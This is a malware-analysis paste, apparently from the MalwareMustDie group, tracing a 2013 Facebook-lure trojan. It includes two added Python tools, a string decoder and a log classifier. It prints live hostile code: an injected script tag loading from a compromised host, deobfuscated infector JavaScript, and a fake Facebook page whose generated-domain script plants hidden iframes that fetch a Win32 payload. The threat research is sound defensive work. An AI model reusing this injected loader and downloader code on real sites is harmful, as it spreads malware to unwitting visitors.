- // #MalwareMUSTDie!
- // Facebook IM & Web-Driven Facebook Trojan with DGA Downloader
- // Infector: 67.228.248.34 (kemslispragmatic.com)...
- // Payload Mothership: 103.246.115.238
- // Block Mitigation String (PAYLOAD)= "best.lt.ua/dlimage4.php"
- // Block Mitigation String (Infector) = "/hwaf.html?h="
- // This Research was conducted by MalwareMustDie, NPO
- // Openly shared material; you can and are welcome to use it
- // for your threat awareness.
- // But please mention the source if you refer to this in your -
- // official blog/writing. With thanks in advance - @unixfreaxjp -
- // Special thanks to URLQuery and VirusTotal; with your dedicated great service we can detect "EVERYTHING" :-)
- @unixfreaxjp /malware]$ date
- Fri Nov 8 06:26:19 JST 2013
- =========================
- INFECTION ROUTE #1:
- FACEBOOK LINKS
- =========================
- 6/39 2013-07-16 01:24:06
- [100]http://olivechurchministry.com/ocef.html?h=2282017
- 5/39 2013-07-16 01:24:06
- [101]http://olivechurchministry.com/ovdt.html?h=2594522
- 5/39 2013-07-16 01:24:05
- [102]http://olivechurchministry.com/zwmd.html?i=629980
- 5/39 2013-07-16 01:24:06
- [103]http://olivechurchministry.com/zlnv.html?i=2382766
- 5/39 2013-07-16 01:24:05
- [104]http://olivechurchministry.com/zwmd.html?h=744758
- 7/39 2013-07-16 01:23:54
- =========================
- INFECTION ROUTE #2:
- INFECTED SITES
- =========================
- // check
- http://www.speedway.ne.jp/%7Esaburo/
- // injected...
- [...]
- </table><!--339810--><script type="text/javascript">var gwloaded = false;</script>
- <script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script><!--/339810-->
- [...]
- // links...
- 4/50 2013-11-07 06:52:00 [35]http://9d.home.pl/pub/pOFBT2NP.php
- 3/50 2013-11-06 11:59:11 [36]http://9d.home.pl/pub
- 1/50 2013-11-06 02:06:16 [37]http://9d.home.pl/pub/pofbt2np.php
- // fetch w/o java
- --2013-11-08 04:48:52-- http://9d.home.pl/pub/pOFBT2NP.php
- Resolving 9d.home.pl (9d.home.pl)... 79.96.233.122
- Caching 9d.home.pl => 79.96.233.122
- Connecting to 9d.home.pl (9d.home.pl)|79.96.233.122|:80... connected.
- ---request begin---
- GET /pub/pOFBT2NP.php HTTP/1.1
- Referer: http://www.speedway.ne.jp/%7Esaburo/
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 301 Moved
- Connection: Keep-Alive
- Content-Length: 202
- Content-Type: text/html
- Date: Thu, 07 Nov 2013 19:48:53 GMT
- Location: http://kemslispragmatic.com/hwaf.html?h=582878
- Server: IdeaWebServer/v0.80
- ---response end---
- 301 Moved
- Registered socket 3 for persistent reuse.
- Location: http://kemslispragmatic.com/hwaf.html?h=582878 [following]
- Skipping 202 bytes of body: [<HTML>
- <HEAD>
- <TITLE>301 Moved</TITLE>
- </HEAD>
- <BODY BGCOLOR=#FFFFFF>
- <H1>301 Moved</H1>
- The document has moved <A HREF="http://kemslispragmatic.com/hwaf.html?h=582878">here</A>.
- </BODY>
- </HTML>
- ] done.
- URI content encoding = None
- --2013-11-08 04:48:53-- http://kemslispragmatic.com/hwaf.html?h=582878
- conaddr is: 79.96.233.122
- Resolving kemslispragmatic.com (kemslispragmatic.com)... 67.228.248.34
- Caching kemslispragmatic.com => 67.228.248.34
- Found kemslispragmatic.com in host_name_addresses_map (0x288041c0)
- Connecting to kemslispragmatic.com (kemslispragmatic.com)|67.228.248.34|:80... connected.
- ---request begin---
- GET /hwaf.html?h=582878 HTTP/1.1
- Referer: http://www.speedway.ne.jp/%7Esaburo/
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 404 Not Found
- Date: Thu, 07 Nov 2013 19:48:54 GMT
- Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
- Content-Length: 523
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: text/html; charset=iso-8859-1
- [...]
- // fetch w/ java
- same result.
- // check the landing page.
- Name: kemslispragmatic.com
- Address: 67.228.248.34
- ============================
- INFECTOR HOST: 67.228.248.34
- ============================
- // domains...
- The server returned the following data:
- [6]kemslispragmatic.com A [7]67.228.248.34
- [8]kemslispragmatic.com NS [9]ns11.syskay.com
- [10]kemslispragmatic.com NS [11]ns12.syskay.com
- // Possible variations of the URL.. checked:
- $ ipchk urlq hwaf.html
- -----------------------------------------------------------
- ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
- -----------------------------------------------------------
- Infection Record Source : urlq vt
- -----------------------------------------------------------
- 2013-11-07 04:15:56
- 1 / 1 [7]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-11-06 07:07:58
- 1 / 0 [8]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-11-06 07:06:25
- 0 / 0 [9]http://kemslispragmatic.com/hwaf.html?h=58287
- 2013-10-31 18:18:31
- 1 / 1 [10]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-10-31 15:44:52
- 1 / 1 [11]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-10-30 21:49:11
- 1 / 1 [12]http://kemslispragmatic.com/hwaf.html?h=582878
- 2/50 2013-11-06 06:07:10
- [56]http://kemslispragmatic.com/hwaf.html?h=582878
- 1/39 2013-09-17 11:02:59
- [64]http://kemslispragmatic.com/hlft.html?i=3343031
- 1/39 2013-07-21 18:58:02
- [89]http://kemslispragmatic.com/hwaf.html?i=3204044
- ===========================
- INFECTOR HTML
- ===========================
- // fetched sample's code (obfuscated HTML/JS; the decoded stages follow):
- // Decoded first step:
- var l2 = window.opera ? 1 : 0;
- function l6b8ac67f9f()
- {
- if (f9f76ca8b6)
- {
- document.write(lO)
- }
- };
- function l3(l4)
- {
- l5 = /za/g; // the packed text writes every NUL byte as the two letters 'za'
- l6 = String.fromCharCode(0);
- l4 = l4.replace(l5, l6);
- var l7 = new Array(), l8 = _1 = l4.length, l9, lI, il = 16256, _1 = 0, I = 0, li = '';
- do
- {
- l9 = l4.charCodeAt(_1);
- lI = l4.charCodeAt( ++ _1);
- l7[I ++ ] = lI + il - (l9 << 7)
- }
- while (_1 ++< l8);
- var l1 = new Array(), l0 = new Array(), Il = 128;
- do
- {
- l0[Il] = String.fromCharCode(Il)
- }
- while ( -- Il);
- Il = 128;
- l1[0] = li = l0[l7[0]];
- ll = l7[0];
- _l = 1;
- var l_ = l7.length - 1;
- while (_l < l_)
- {
- switch(l7[_l] < Il ? 1 : 0)
- {
- case 0 : l0[Il] = l0[ll] + String(l0[ll]).substr(0, 1);
- l1[_l] = l0[Il];
- if (l2)
- {
- li += l0[Il]
- };
- break ;
- default : l1[_l] = l0[l7[_l]];
- if (l2)
- {
- li += l0[l7[_l]]
- };
- l0[Il] = l0[ll] + String(l0[l7[_l]]).substr(0, 1);
- break
- };
- Il++;
- ll = l7[_l];
- _l ++
- };
- if (!l2)
- {
- return (l1.join(''))
- }
- else
- {
- return li
- }
- };
- var lO = '';
- for (ii = 0; ii < p2oWy1B.length; ii ++ )
- {
- lO += l3(p2oWy1B[ii])
- };
- l6b8ac67f9f();
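The `l3()` routine above is a two-step unpacker: undo the `za` escape and turn each character pair into a code, then LZW-decompress with a 127-entry initial dictionary. What follows is an added Python re-implementation (mine, not the paste's or MalwareMustDie's code; the function names are my own) so that the packed `p2oWy1B[]` strings can be decoded offline without running the script; the small packer at the end exists only to build round-trip test input.

```python
# Added example (not MalwareMustDie's code): offline re-implementation of the
# deobfuscated l3() string unpacker, so packed p2oWy1B[] elements can be decoded
# without executing the page's JavaScript. Names are mine; the packer below is
# only there to generate test data for the decoder.
from typing import Dict, List

INITIAL_DICT_SIZE = 128   # l3() seeds the table with chr(1)..chr(127); new codes start at 128
CODE_BIAS = 16256         # the literal 16256 (= 127 * 128) in l3()


def unpack_codes(packed: str) -> List[int]:
    """Step 1 of l3(): 'za' stands for a NUL character; afterwards every pair of
    characters (hi, lo) is one LZW code = lo + 16256 - (hi << 7)."""
    raw = packed.replace("za", "\0")
    if len(raw) % 2:
        raise ValueError("packed data must have an even number of characters")
    codes = []
    for i in range(0, len(raw), 2):
        hi, lo = ord(raw[i]), ord(raw[i + 1])
        codes.append(lo + CODE_BIAS - (hi << 7))
    return codes


def lzw_decode(codes: List[int]) -> str:
    """Step 2 of l3(): ordinary LZW decompression. The original's
    switch(l7[_l] < Il ? 1 : 0) separates a known code (default:) from the
    KwKwK case (case 0:), where the code being read is the entry being defined."""
    if not codes:
        return ""
    table: Dict[int, str] = {c: chr(c) for c in range(1, INITIAL_DICT_SIZE)}
    next_code = INITIAL_DICT_SIZE
    prev = codes[0]
    out = [table[prev]]
    for code in codes[1:]:
        if code < next_code:                 # default: code already in the table
            entry = table[code]
            table[next_code] = table[prev] + entry[0]
        else:                                # case 0: KwKwK, entry = prev + prev[0]
            entry = table[prev] + table[prev][0]
            table[next_code] = entry
        out.append(entry)
        next_code += 1
        prev = code
    return "".join(out)


def l3(packed: str) -> str:
    """Equivalent of the page's l3(l4) for one p2oWy1B[] element."""
    return lzw_decode(unpack_codes(packed))


# --- packer: used only to produce test input for the decoder above ----------

def lzw_encode(text: str) -> List[int]:
    """Plain LZW over 7-bit text with the dictionary layout l3() expects."""
    table: Dict[str, int] = {chr(c): c for c in range(1, INITIAL_DICT_SIZE)}
    next_code = INITIAL_DICT_SIZE
    codes, w = [], ""
    for ch in text:
        if not 1 <= ord(ch) < INITIAL_DICT_SIZE:
            raise ValueError(f"character {ch!r} is outside the 7-bit alphabet")
        if w + ch in table:
            w += ch
        else:
            codes.append(table[w])
            table[w + ch] = next_code
            next_code += 1
            w = ch
    if w:
        codes.append(table[w])
    return codes


def pack_codes(codes: List[int]) -> str:
    """Inverse of unpack_codes(). A NUL is written as 'za'; the format has no
    escape for a literal 'za', so such output would be corrupted by l3()."""
    packed = "".join(chr(127 - (c >> 7)) + chr(c & 127) for c in codes)
    if "za" in packed:
        raise ValueError("output contains a literal 'za' that l3() would mis-decode")
    return packed.replace("\0", "za")


def round_trip(text: str) -> str:
    return l3(pack_codes(lzw_encode(text)))


if __name__ == "__main__":
    sample = "document.write('<iframe src=\"about:blank\" width=\"0\" height=\"0\"></iframe>')"
    packed = pack_codes(lzw_encode(sample))
    print(repr(packed))
    print(l3(packed))
```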
- // Decoded Second Step (extracted values / written):
- <HTML><head><script>eval(unescape('
- \166ar%20q%79%37%3D%27%27%3Bq%79%38%3D%53t%72ing%2Ef%72\157\155C%68a%72Cod\145%28%31%33%2C
- %31%30%29%3B%66%6F%72%28i%3D%30%3Bi%3C%32%32%37%39%3B\151%2B%2B%29%7Bq%79%37%2B%3D\161%79%
- 38%7D%3Bfu\156%63t\151%6F\156%20qy%36%28%29%7B\151%66%28%21%64\157%63u\155%65%6Et%2E\141l%
- 6C%29%7Bd%6Fc\165me\156t%2Ew\162i%74%65%28\161\171%37%29%7D%7D%3B%71y%36%28%29%3Bf\165n\14
- 3\164\151o\156%20q%79%39%28%29%7B\172\151%39%3D%22%3Cs%22%2B%22p\141%6E%20%73%74yle%3D%27%
- 64\151sp\154\141y%3Anone%27%3E%3C\160%72%65%3E%22%2B%71%79%37%2B%22%3C%2F%70r\145%3E%3C%2F
- \163%22%2B%22pan%3E%22%3B%7Ai%32%3D%6Eew%20\101%72%72%61y%28%27\141ft\145rBe%67in%27%2C%27
- %62e\146\157\162e\105nd%27%2C%27\141%66ter\105%6E%64%27%2C%27%62%65f\157\162\145%42e%67%69
- n%27%29%3B%7Ai%33%3D%6Ee\167%20Ar%72a\171%28%27\150t\155\154%27%2C%27h%65ad%27%2C%27b\157\
- 144y%27%29%3B\146%6F%72%28k%3D%30%3B%6B%3C%3Dz\151%33%2El%65ngt\150%3B\153%2B%2B%29%7B\172
- i%34%3D%64\157\143%75m%65%6Et%2Eg%65%74%45\154e\155\145n\164%73%42%79Ta\147%4Eam\145%28z%6
- 9%33%5Bk%5D%29%3B\146%6F\162%28j%3D%30%3B\152%3C%3D%7Ai%34%2E%6C\145%6Eg\164h%3B\152%2B%2B
- %29%7Bfor%28i%3D%30%3Bi%3C%3D%33%3Bi%2B%2B%29%7B%69f%28\172i%34%5B%6A%5D%29%7Bzi%34%5Bj%5D
- %2E%69\156s\145\162%74\101\144ja\143%65\156tH%54%4D\114%28z\151%32%5B\151%5D%2Cz%69%39%29%
- 7D%7D%7D%7D%7D%3B'))</script><script>nsp = 'Old browser!';
- dl = document.layers;
- oe = window.opera ? 1 : 0;
- da = document.all &&! oe;
- ge = document.getElementById;
- ws = window.sidebar ? true : false;
- tN = navigator.userAgent.toLowerCase();
- izN = tN.indexOf('netscape') >= 0 ? true : false;
- zis = tN.indexOf('msie 7') >= 0 ? true : false;
- zis8 = tN.indexOf('msie 8') >= 0 ? true : false;
- zis |= zis8;
- if (ws &&! izN)
- {
- quogl = 'iuy'
- };
- var msg = '';
- function nem()
- {
- return true
- };
- window.onerror = nem;
- zOF = window.location.protocol.indexOf("file") !=- 1 ? true : false;
- i7f = zis &&! zOF ? true : false;
- if (da)
- {
- document.ondragstart = function ()
- {
- return false
- };
- function cIE()
- {
- (msg);
- return false
- };
- function cc()
- {
- document.oncontextmenu = cIE;
- setTimeout("cc()", 200)
- };
- cc()
- };
- function cNS(e)
- {
- if (dl || ws)
- {
- if (e.which == 2 || e.which == 3)
- {
- (msg);
- return false
- }
- }
- };
- if (dl)
- {
- document.captureEvents(Event.MOUSEDOWN);
- document.onmousedown = cNS
- }
- else
- {
- document.onmouseup = cNS
- };
- document.oncontextmenu = new Function("return false");
- if (oe)
- {
- function ro(e)
- {
- if (event.button == 2)
- {
- alert(' ');
- return 0
- };
- return true
- };
- document.onmousedown = ro
- };
- function ns9()
- {
- window.status = ' ';
- setTimeout('ns9()', 1000);
- return true
- };
- if (!oe)
- {
- ns9();
- document.onmouseover = ns9;
- document.onmouseout = ns9
- };
- function u0(a)
- {
- return false
- };
- function u1(e)
- {
- return (e.target.tagName != null && e.target.tagName.search(
- '^(INPUT|TEXTAREA|BUTTON|SELECT|HTML)$') !=- 1)
- };
- function u2(e)
- {
- if (e.which == 1)
- {
- window.captureEvents(Event.MOUSEMOVE);
- window.onmousemove = u0
- }
- };
- function u3(e)
- {
- if (e.which == 1)
- {
- window.releaseEvents(Event.MOUSEMOVE);
- window.onmousemove = null
- }
- };
- if (dl)
- {
- window.captureEvents(Event.MOUSEUP | Event.MOUSEDOWN);
- window.onmousedown = u2;
- window.onmouseup = u3
- }
- else if (ge &&! da)
- {
- document.onmousedown = u1
- };
- function nn()
- {
- if (window.getSelection)
- {
- var t = window.getSelection().toString();
- if (t.indexOf('qweasdzxc') > 1 || t.length > 40)
- {
- document.body.innerHTML = '.';
- location.reload()
- };
- setTimeout("nn()", 200)
- }
- };
- nn();
- function ni()
- {
- if (da)
- {
- document.onselectstart = function ()
- {
- return false
- };
- setTimeout("ni()", 200)
- }
- };
- ni();
- if (da &&! oe &&! i7f)
- {
- fc = '<' +
- 'div style="position:absolute;left:-1000px;top:-1000px;width:60px;height:35px;z-index:1">' + '<' +
- 'input type="button" name="xqq" value="" onClick=ccd() style="visibility:hidden"><' + '/div>';
- document.write(fc);
- function ccd()
- {
- clipboardData.clearData()
- };
- function cce()
- {
- xqq.click();
- setTimeout("cce()", 300)
- };
- setTimeout("cce()", 3000)
- };
- if (zis8)
- {
- window.attachEvent('onload', qy9)
- };
- </script><script id='lllI'>var ppconf = 0;
- var qy7 = '';
- qy8 = String.fromCharCode(13, 10, 13, 10);
- for (i = 0; i < 470; i ++ )
- {
- qy7 += qy8
- };
- lI1I = "<" + "!--" + qy7 + "--" + ">";
- III1 = "/" + "*" + qy7 + "*" + "/";
- Illl = "<scr" + "ipt>" + lIII(1) + lIII(2) + "='" + lIII(3) + "'</scri" + "pt>";
- l1II = "<s" + "pan style='display:none'><pre>" + qy7 + "</pre></s" + "pan>";
- l1Il = l1II + lI1I + l1II;
- Il11 = "<" + "span>";
- I1l1 = "</" + "span>";
- Ill1 = "<" + "span style='visibility:hidden'>qweasdzxc" + I1l1;
- function l11I()
- {
- I111 = new Array('beforeBegin', 'afterBegin', 'beforeEnd', 'afterEnd');
- Il1I = new Array('html', 'head', 'body', 'a', 'img', 'div', 'form', 'table', 'script',
- 'input', 'p');
- lII1 = l1I1();
- switch(lII1)
- {
- case 1 : IIII = new Array(79, 79, 79, 73, 73, 73, 73, 73, 73, 73, 73);
- break ;
- case 2 : IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
- break ;
- case 3 : IIII = new Array(0, 38, 38, 15, 9, 15, 9, 9, 22, 15, 15);
- break ;
- case 4 : IIII = new Array(38, 47, 47, 15, 41, 15, 9, 9, 22, 15, 15);
- break ;
- default : IIII = new Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
- };
- lIIl = new Array(lI1I, III1, Illl, l1II, l1Il, Il11, I1l1, Ill1);
- I11l(document.getElementsByTagName(Il1I[2])[0], 2, lIIl[7]);
- for (t = 0; t < Il1I.length; t ++ )
- {
- m = IIII[t];
- I1lI = document.getElementsByTagName(Il1I[t]);
- ctaL = I1lI.length;
- for (j = 0; j < ctaL; j ++ )
- {
- for (x = 0; x < 4; x ++ )
- {
- if (m & Math.pow(2, x))
- {
- I11l(I1lI[j], x, lIIl[m >>> 4])
- }
- }
- }
- };
- IllI();
- I1ll();
- llll();
- lI1l();
- setTimeout('l11l()', 1000)
- };
- function IllI()
- {
- var I11I = document.images, IIIl = document.links, il = I11I.length, ll = IIIl.length,
- lll1;
- while (il)
- {
- Il1l = document.createElement('span');
- lll1 = I11I[ -- il];
- if (!(ppconf & 2))
- {
- try
- {
- Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
- }
- catch (e)
- {
- }
- }
- };
- while (ll)
- {
- Il1l = document.createElement('span');
- lll1 = IIIl[ -- ll];
- if (!(ppconf & 1))
- {
- try
- {
- Il1l.appendChild(lll1.parentNode.replaceChild(Il1l, lll1))
- }
- catch (e)
- {
- }
- }
- }
- };
- function I1ll()
- {
- window.open = null;
- document.open = null;
- window.alert = null;
- };
- function llll()
- {
- var extraFunc1Cntnt = 0
- };
- function lI1l()
- {
- var extraFunc2Cntnt = 0
- };
- function I11l(e, p, c)
- {
- try
- {
- if (!window.sidebar)
- {
- e.insertAdjacentHTML(I111[p], c)
- }
- else
- {
- rcf = document.createRange().createContextualFragment(c);
- if (p == 0)
- {
- e.parentNode.insertBefore(rcf, e)
- };
- if (p == 1)
- {
- e.insertBefore(rcf, e.firstChild)
- };
- if (p == 2)
- {
- e.appendChild(rcf)
- };
- if (p == 3)
- {
- e.parentNode.insertBefore(rcf, e.nextSibling)
- }
- }
- }
- catch (xuu)
- {
- }
- };
- function lIII(j)
- {
- r = Math.random();
- d = new Date().getTime();
- if (j == 1)
- {
- o = String.fromCharCode(Math.floor(r * 25 + 65))
- }
- else
- {
- o = Math.floor(r * d * 1000) + '';
- o += o;
- o += o;
- o += o
- };
- if (j == 3)
- {
- o += o;
- o += o
- };
- return o
- };
- if (typeof window.addEventListener != 'undefined')
- {
- window.addEventListener('load', l11I, false)
- }
- else if (typeof document.addEventListener != 'undefined')
- {
- document.addEventListener('load', l11I, false)
- }
- else if (typeof window.attachEvent != 'undefined')
- {
- window.attachEvent('onload', l11I)
- };
- function l1I1()
- {
- lII1 = 0;
- u = navigator.userAgent.toLowerCase();
- if (window.sidebar)
- {
- lII1 = 2
- };
- if (window.chrome)
- {
- lII1 = 3
- };
- if (window.opera)
- {
- lII1 = 4
- };
- if (document.all && lII1 !== 4)
- {
- lII1 = 1
- };
- if (u.indexOf('safari') > 1)
- {
- lII1 = 3
- };
- if ((lII1 == 1) && (u.indexOf('ie 10') > 1))
- {
- lII1 = 10
- };
- return lII1
- }
- </script> <script>function l11l()
- {
- try
- {
- l111 = document.getElementById('lllI');
- l111.parentNode.removeChild(l111)
- }
- catch (errr)
- {
- }
- }
- </script>
- //===================================
- //THE THREAT STARTS HERE!!!
- //The DGA Downloader Engine..
- //#MalwareMustDie!
- //====================================
- <TITLE>
- Facebook</TITLE><META NAME="Generator" CONTENT="Facebook.com"><META NAME="Author" CONTENT=
- "Facebook.com"><META NAME="Keywords" CONTENT="Wow, lol, awesome, cool"><META NAME="Description"
- CONTENT="Wow! Have you ever seen?"><link rel="shortcut icon" href=
- "http://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" /></HEAD><BODY> <script type=
- 'text/javascript'>function randomString(length)
- {
- var chars = 'abcdefghiklmnopqrstuvwxyz'.split('');
- if (!length)
- {
- length = Math.floor(Math.random() * chars.length)
- };
- var str = '';
- for (var i = 0; i < length; i ++ )
- {
- str += chars[Math.floor(Math.random() * chars.length)]
- };
- return str
- };
- function genDomain()
- {
- var sdom = 'http://' + randomString(6) + '.best.lt.ua/dlimage4.php?' + randomString(2) +
- '=' + randomString(4);
- document.write('<iframe src="' + sdom +
- '" width="0" height="0" frameborder="0"></iframe>');
- };
- genDomain()</script> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding=
- "0" align="center"><tbody><tr bgcolor="#3B5998" height="80"><td align="left" valign="center"><IMG
- SRC="http://fbstatic-a.akamaihd.net/rsrc.php/v2/yX/x/Qq6L1haQrYr.png" BORDER="0" ALT=""></td></tr>
- <tr bgcolor="#E7EBF2"><td align="center" valign="center"><font face=
- "lucida grande,tahoma,verdana,arial" color="#0E385F" size="+4"><B>
- Download and execute the facebook app, please! You will be surprised :)</B></font></td></tr><tr
- bgcolor="#E7EBF2"><td align="center" valign="top"><font face="lucida grande,tahoma,verdana,arial"
- color="#333333">Your download should be starting in 2 seconds...</font><BR><BR><A HREF=
- "javascript:document.location.href=document.location.href;"><font face=
- "lucida grande,tahoma,verdana,arial" color="#0E385F"><B>
- If your download doesn't start, please click here</B></font></A></td></tr></tbody></table> <script
- type='text/javascript'>window.setTimeout("document.location.href='http://wickedreport.com'", 120000)</script> </BODY></HTML>
- ===========================
- MALICIOUS URL FOR DOWNLOAD
- ===========================
- http://xizcvo.best.lt.ua/dlimage4.php?ol=bzhe
- http://kvnkyp.best.lt.ua/dlimage4.php?ol=bzhe
- http://lgktbu.best.lt.ua/dlimage4.php?zz=lwgb
- http://eclrwr.best.lt.ua/dlimage4.php?zz=lwgb
- http://xtkmcv.best.lt.ua/dlimage4.php?ol=bzhe
- http://knqmlf.best.lt.ua/dlimage4.php?ol=qmark
- and so on; many more similar URLs..
- ===========================
- MITIGATION
- ===========================
- Research search string (note: NOT a regex) and mitigation/block string = "best.lt.ua/dlimage4.php"
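The block string above works because `genDomain()` only randomizes the subdomain and the query; the parent domain and the file name are fixed. As an added example (mine, not part of the paste), the classifier below applies that plain substring to proxy-log URLs and, separately, checks whether a URL has the exact shape `randomString()` produces (six letters from an alphabet that lacks 'j', a two-letter key, a four-letter value). The log lines are constructed; four of the URLs come from the paste's MALICIOUS URL list.

```python
# Added example (not part of the MalwareMustDie paste): URL/proxy-log classifier
# built from two facts on this page, the plain block string from the MITIGATION
# section and the exact output shape of genDomain()/randomString().
import re
from dataclasses import dataclass
from typing import Iterable, List
from urllib.parse import parse_qsl, urlsplit

BLOCK_STRING = "best.lt.ua/dlimage4.php"     # substring match, as the paste says: NOT a regex
DGA_ALPHABET = "abcdefghiklmnopqrstuvwxyz"    # copied from randomString(); note the missing 'j'
_L = f"[{DGA_ALPHABET}]"
HOST_RE = re.compile(rf"^{_L}{{6}}\.best\.lt\.ua$")   # randomString(6) + '.best.lt.ua'
KEY_RE = re.compile(rf"^{_L}{{2}}$")                  # randomString(2)
VALUE_RE = re.compile(rf"^{_L}{{4}}$")                # randomString(4)


@dataclass
class Verdict:
    url: str
    blocked: bool      # contains the fixed infrastructure string -> block/alert
    dga_shape: bool    # additionally matches genDomain()'s exact output shape


def classify(url: str) -> Verdict:
    blocked = BLOCK_STRING in url
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    dga_shape = (
        parts.scheme == "http"                        # genDomain() hardcodes 'http://'
        and HOST_RE.match(parts.hostname or "") is not None
        and parts.path == "/dlimage4.php"
        and len(params) == 1
        and KEY_RE.match(params[0][0]) is not None
        and VALUE_RE.match(params[0][1]) is not None
    )
    return Verdict(url, blocked, dga_shape)


def scan_log(lines: Iterable[str]) -> List[Verdict]:
    """Return a verdict for every hit in '<ts> <client> <method> <url>' lines."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue                                  # malformed line, skip it
        verdict = classify(fields[3])
        if verdict.blocked or verdict.dga_shape:
            hits.append(verdict)
    return hits


# Constructed log: URLs from the paste's MALICIOUS URL list (the 'qmark' one does
# not fit the 4-letter value shape, so only the block string catches it), one
# look-alike that merely borrows the file name, and ordinary traffic.
SAMPLE_LOG = [
    "1383858502 10.0.0.12 GET http://xizcvo.best.lt.ua/dlimage4.php?ol=bzhe",
    "1383858503 10.0.0.12 GET http://lgktbu.best.lt.ua/dlimage4.php?zz=lwgb",
    "1383858511 10.0.0.31 GET http://knqmlf.best.lt.ua/dlimage4.php?ol=qmark",
    "1383858520 10.0.0.31 GET http://www.example.com/dlimage4.php?ol=bzhe",
    "1383858521 10.0.0.31 GET http://www.example.com/index.html",
    "garbage line",
]

if __name__ == "__main__":
    for v in scan_log(SAMPLE_LOG):
        print(f"block={v.blocked!s:5} dga_shape={v.dga_shape!s:5} {v.url}")
```

The fixed string is the durable indicator: the subdomain and query change on every page load, so a rule keyed on them would miss the next sample while the block string still fires.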
- ===========================
- PAYLOAD:
- ===========================
- ]$ wget http://paphgi.best.lt.ua/dlimage4.php
- --2013-11-08 06:08:22-- http://paphgi.best.lt.ua/dlimage4.php
- Resolving paphgi.best.lt.ua (paphgi.best.lt.ua)... 103.246.115.238
- Connecting to paphgi.best.lt.ua (paphgi.best.lt.ua)|103.246.115.238|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 160768 (157K) [application/force-download]
- Saving to: 'dlimage4.php'
- 100%[==============>] 160,768 405KB/s in 0.4s
- 2013-11-08 06:08:24 (405 KB/s) - 'dlimage4.php' saved [160768/160768]
- $ wget http://ahrcdv.best.lt.ua/dlimage4.php -O sample
- --2013-11-08 06:20:15-- http://ahrcdv.best.lt.ua/dlimage4.php
- Resolving ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)... 103.246.115.238
- Connecting to ahrcdv.best.lt.ua (ahrcdv.best.lt.ua)|103.246.115.238|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 160768 (157K) [application/force-download]
- Saving to: 'sample2.exe'
- 100%[==============>] 160,768 349KB/s in 0.5s
- 2013-11-08 06:20:16 (349 KB/s) - 'sample2.exe' saved [160768/160768]
- // bintext: header dump shows MZ/PE, i.e. a Win32 executable served as dlimage4.php
- https://www.virustotal.com/en/file/c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef/analysis/
- SHA256: c86c44ad564ad33d9c92e41530933747dc954875cbad403b809d2a86567b34ef
- SHA1: a98f5ae3e3f1dc174812706b7318708acae7af77
- MD5: d3fa25f8f7568735d36d565aa2b99c1a
- File size: 157.0 KB ( 160768 bytes )
- File name: a98f5ae3e3f1dc174812706b7318708acae7af77
- File type: Win32 EXE
- Tags: peexe
- Detection ratio: 5 / 47
- Analysis date: 2013-11-07 14:55:28 UTC ( 6 hours, 18 minutes ago )
- MORE PAYLOADS:
- http://urlquery.net/search.php?q=best.lt.ua%2Fdlimage4.php&type=string&start=2013-10-23&end=2013-11-07&max=50
- ----
- MalwareMustDie, NPO Research Group
- Web http://malwaremustdie.org
- Research blog: http://malwaremustdie.blogspot.com
- Wiki & Code: http://code.google.com/p/malwaremustdie/
- Report Pastes: http://pastebin.com/u/MalwareMustDie